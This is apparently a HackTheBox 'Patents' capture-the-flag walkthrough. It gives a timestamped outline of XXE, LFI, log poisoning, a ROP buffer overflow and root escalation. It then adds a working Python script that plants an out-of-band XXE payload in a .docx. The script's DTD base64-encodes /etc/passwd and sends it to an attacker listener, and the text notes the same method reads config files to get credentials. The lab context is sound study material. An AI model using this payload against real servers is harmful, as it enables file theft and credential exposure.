HackTheBox - Patents


01:00 - Start of nmap, there's a weird 8888 port.
03:55 - Looking at the website, downloading a docx
06:30 - Finally running GoBuster, doing the raft wordlist because it has "UpdateDetails"
15:15 - Running GoBuster against the "release" directory to get release notes and researching XML and DocX
22:00 - Adding an XXE Payload into our Word Document: customXml/item1.xml
26:15 - Making an XXE Chain to extract files using HTTP and PHP's Encoder
33:20 - Extracting the Apache Config to see DocRoot, then extracting config.php
37:40 - Exploring LFI Injection into getPatent_alphav1.0.php, explaining what happens with bad regex to remove things.
42:10 - Exploring Log File Poisoning
54:00 - Shell returned on the box, fixing up the TTY and searching for files by creation time
58:30 - There's a file in /opt/ that hints at a cronjob running a task every minute. Running pspy to see the process creation
01:01:40 - Password is exposed in the command; this is the root password to the Docker container. Exploring the cron and the /opt/lfm directory
01:11:25 - Exploring the lfm directory and examining old git commits to get the binary of lfmserver and some old source code.
01:15:00 - Opening it up in Ghidra, defining main
01:17:20 - Going into the first piece of the program, which looks like an argument check. Looking at the source to verify we are correct.
01:20:30 - Searching for the password in the binary to see where it is used. Using GDB to help us understand what is happening
01:24:30 - Start of creating an exploit script
01:29:50 - Changing the password to ippsec and looking at it in GDB to confirm a variable... A bunch more playing around learning the binary
01:44:10 - Discovering the application expects files to be in /files/, which behaves like DOC_ROOT
01:45:10 - Explaining where I think the buffer overflow happens (URLDecode)
01:50:00 - Crashed the application, discovering the correct spot to overwrite with "pattern create"
01:54:00 - Using Ropper to find some pop gadgets to use, then creating a gadget to leak an address using write(). Then doing a bunch of troubleshooting around the MD5 sum to get the code to a spot that triggers our overflow.
02:19:00 - End of troubleshooting that MD5 issue. Viewing what the server is sending in Wireshark
02:27:30 - Calculating memory offsets based upon the leak
02:36:10 - Creating a gadget to map stdin/stdout and then execute bash... Then lots of troubleshooting, some encoding issue.
02:42:20 - Memory address looks weird; using GDB to confirm we grabbed the wrong address.
02:49:00 - Calculating where the /bin/sh string would be located, and now our script works locally!
02:51:10 - When going against the target, our script isn't even getting the memory leak... Incorrectly thinking there's some ACL based around IP address. Using an SSH tunnel to create a reverse tunnel and access the server through the Docker container
02:55:00 - Realizing the MD5 is wrong since convert.php on our target is different than on our box!
02:57:15 - Address leaked! Using libc-database to hunt for the version of libc on the target machine
03:00:00 - libc-database found the correct libc; modifying our exploit script to use this libc, then getting a shell
03:05:30 - Running LinPEAS and noticing that /dev/sdb1 is mounted to /root; examining /dev/sda2 to see if there was a /root directory underneath to get root.txt.
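
The XXE-in-docx step (22:00 to 33:20) in one script, as an added example that is not code from the video or the box: it builds a constructed stand-in .docx, swaps customXml/item1.xml for a stage-1 payload that loads a DTD from an attacker host, and generates that DTD, which wraps the target file in php://filter's base64 encoder and sends it back over HTTP. The attacker address 10.10.14.2:8000, the target file /etc/passwd and the minimal document parts are assumptions, not values from the video.

```python
"""Out-of-band XXE through a .docx custom XML part (added example, not from the video)."""
import base64
import io
import zipfile

# Assumptions (not from the video): attacker HTTP listener and file to read.
ATTACKER_URL = "http://10.10.14.2:8000"
TARGET_FILE = "/etc/passwd"

# Stage 1: replaces customXml/item1.xml. The parser that handles the part
# fetches the external DTD and executes whatever parameter entities it declares.
XXE_STAGE1 = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x [
  <!ENTITY % remote SYSTEM "{dtd_url}">
  %remote;
]>
<x>xxe</x>
"""


def attacker_dtd(target_file: str, callback_url: str) -> str:
    """Stage 2, served from the attacker's listener as xxe.dtd.

    php://filter base64-encodes the file so newlines and XML-special characters
    in it cannot break the outgoing URL. &#x25; becomes a literal '%' once the
    entity value has been parsed, so 'exfil' is declared as a parameter entity
    whose URL carries the encoded data back to the listener."""
    return (
        f'<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource={target_file}">\n'
        f'<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM \'{callback_url}/?d=%data;\'>">\n'
        "%wrap;\n"
        "%exfil;\n"
    )


def build_minimal_docx() -> bytes:
    """Constructed stand-in for the document downloaded from the site."""
    parts = {
        "[Content_Types].xml": '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/></Types>',
        "word/document.xml": '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>",
        "customXml/item1.xml": '<?xml version="1.0" encoding="UTF-8"?>\n<props/>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


def inject_xxe(docx_bytes: bytes, dtd_url: str, entry: str = "customXml/item1.xml") -> bytes:
    """Copy every entry of the .docx unchanged except `entry`, which becomes the
    stage-1 payload. Leaving the other parts intact keeps the file a valid
    document for whatever server-side code unzips and parses it."""
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    out = io.BytesIO()
    payload = XXE_STAGE1.format(dtd_url=dtd_url)
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        replaced = False
        for info in src.infolist():
            if info.filename == entry:
                dst.writestr(info.filename, payload)
                replaced = True
            else:
                dst.writestr(info, src.read(info.filename))
        if not replaced:  # document had no such part: add it
            dst.writestr(entry, payload)
    return out.getvalue()


def read_entry(docx_bytes: bytes, entry: str) -> str:
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(entry).decode()


def decode_exfil(d_param: str) -> str:
    """What the listener does with the ?d= value it receives."""
    return base64.b64decode(d_param).decode()


if __name__ == "__main__":
    poisoned = inject_xxe(build_minimal_docx(), f"{ATTACKER_URL}/xxe.dtd")
    with open("poisoned.docx", "wb") as f:
        f.write(poisoned)
    with open("xxe.dtd", "w") as f:  # serve this from ATTACKER_URL
        f.write(attacker_dtd(TARGET_FILE, ATTACKER_URL))
```

Serve xxe.dtd from the listener, upload poisoned.docx, and read the base64 out of the ?d= request that comes back; the same two-stage shape, pointed at the Apache config and then config.php, is what the 33:20 chapter uses to find the document root and credentials.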

Reviewed by Anonymous on May 16, 2020. Rating: 5